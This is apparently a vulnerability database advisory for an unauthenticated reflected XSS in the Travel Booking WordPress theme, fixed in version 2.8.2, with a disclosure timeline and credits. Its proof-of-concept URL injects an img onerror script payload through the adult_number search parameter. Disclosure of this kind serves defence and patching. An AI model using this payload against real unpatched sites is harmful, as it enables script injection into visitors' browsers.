Travel Booking < 2.8.2 – Unauthenticated Reflected XSS | Theme Vulnerabilities

Description

Unauthenticated Reflected XSS vulnerability was discovered in the «Travel Booking WordPress Theme», tested version — v2.8.1.

Edit (WPScanTeam)
June 17th, 2020 - Confirmed & Escalated to Envato.
June 18th, 2020 - v2.8.2 released, fixing the issue.

Proof of Concept

https://example.com/search-hotel-full-map/?location_name=x&location_id=x&start=&end=&date=16/06/2020 12:00 am-17/06/2020 11:59 pm&room_num_search=x&adult_number="><img src='x' onerror=alert(`XSS`)>&child_number=0&price_range=x&taxonomy[hotel_facilities]=

Affects Themes

Fixed in 2.8.2

References

URL

https://themeforest.net/item/traveler-traveltourbooking-wordpress-theme/10822683

URL

https://travelerwp.com/traveler-changelog/

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Vlad Vector

Submitter

VLΛD VΞCTOR

Submitter website

https://vladvector.ru

Submitter twitter

Verified

Yes

WPVDB ID

95dff079-2d85-43d8-b8f6-c6b51903fc96

Timeline

Publicly Published

2020-06-19 (about 5 years ago)

Added

2020-06-19 (about 5 years ago)

Last Updated

2020-07-09 (about 5 years ago)

Other

Published

Title

Published

2025-11-10

Title

Stars Testimonials < 3.3.5 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2014-08-01

Title

WordPress 3.6 - SWF/EXE File Upload Cross-Site Scripting (XSS)

Published

2023-04-03

Title

WP FEvents Book <= 0.46 - Subscriber+ Stored XSS

Published

2025-03-11

Title

pipDisqus < 1.7 - Authenticated (Administrator+) Stored Cross-Site Scripting

Published

2025-04-17

Title

MaxButtons < 9.8.4 - Admin+ Stored XSS